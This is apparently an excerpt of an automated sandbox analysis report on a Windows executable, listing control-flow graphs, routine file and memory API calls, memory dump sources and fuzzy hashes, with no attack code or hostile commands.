                                                                                            control_flow_graph 321 407749-40774a 322 4076dc-4076e6 WriteFile 321->322 323 40774c-40776f 321->323 324 4076e8-4076ea call 40748c 322->324 325 4076ef-4076f2 322->325 326 407770-407785 323->326 324->325 328 407700-407704 325->328 329 4076f4-4076fb call 4073ec 325->329 330 407787 326->330 331 4077f9 326->331 329->328 333 40778a-40778f 330->333 334 4077fd-407802 330->334 335 40783b-40783d 331->335 336 4077fb 331->336 338 407803-407819 333->338 340 407791-407792 333->340 334->338 339 407841-407843 335->339 336->334 341 40785b-40785c 338->341 349 40781b 338->349 339->341 342 407724-407741 340->342 343 407794-4077b4 340->343 345 4078d6-4078eb call 407890 InterlockedExchange 341->345 346 40785e-40788c 341->346 348 4077b5 342->348 350 407743 342->350 343->348 366 407912-407917 345->366 367 4078ed-407910 345->367 359 407820-407823 346->359 360 407890-407893 346->360 353 4077b6-4077b7 348->353 354 4077f7-4077f8 348->354 355 40781e-40781f 349->355 356 407746-407747 350->356 357 4077b9 350->357 353->357 354->331 355->359 356->321 361 4077bb-4077cd 356->361 357->361 363 407898 359->363 364 407824 359->364 360->363 361->339 365 4077cf-4077d4 361->365 368 40789a 363->368 364->368 369 407825 364->369 365->335 374 4077d6-4077de 365->374 367->366 367->367 371 40789f 368->371 372 407896-407897 369->372 373 407826-40782d 369->373 375 4078a1 371->375 372->363 373->375 376 40782f 373->376 374->326 384 4077e0 374->384 378 4078a3 375->378 379 4078ac 375->379 380 407832-407833 376->380 381 4078a5-4078aa 376->381 378->381 383 4078ae-4078af 379->383 380->335 380->355 381->383 383->371 385 4078b1-4078bd 383->385 384->354 385->363 386 4078bf-4078c0 385->386
                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                            • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                                            • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                            • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLibraryLoadMode
                                                                                            • String ID:
                                                                                            • API String ID: 2987862817-0
                                                                                            • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                            • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                            • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                            • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
                                                                                            APIs
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021103AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                            • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                            • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                            • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
                                                                                            APIs
                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastRead
                                                                                            • String ID:
                                                                                            • API String ID: 1948546556-0
                                                                                            • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                            • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                            • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                            • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
                                                                                            APIs
                                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                            • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021103AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                            • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                            • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                            • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$AllocFree
                                                                                            • String ID:
                                                                                            • API String ID: 2087232378-0
                                                                                            • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                            • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                            • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                            • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                                              • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                                              • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1658689577-0
                                                                                            • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                            • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                                            • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                            • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                            • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                            • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                            • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                            • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                            • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                            • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                            • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                            • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                            • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021103AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastWrite
                                                                                            • String ID:
                                                                                            • API String ID: 442123175-0
                                                                                            • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                            • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                            • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                            • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                            APIs
                                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessage
                                                                                            • String ID:
                                                                                            • API String ID: 1306739567-0
                                                                                            • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                            • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                            • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                            • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                            APIs
                                                                                            • SetEndOfFile.KERNEL32(?,02127CA4,0040A08C,00000000), ref: 004076B3
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021103AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 734332943-0
                                                                                            • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                            • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                            • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                            • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                            • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                            • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                            • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                            • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                            • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                            • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                            APIs
                                                                                            • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrev
                                                                                            • String ID:
                                                                                            • API String ID: 122130370-0
                                                                                            • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                            • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                            • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                            • Instruction Fuzzy Hash:
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                            • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                                                            • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                            • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                                                            APIs
                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1263568516-0
                                                                                            • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                            • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                            • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                            • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
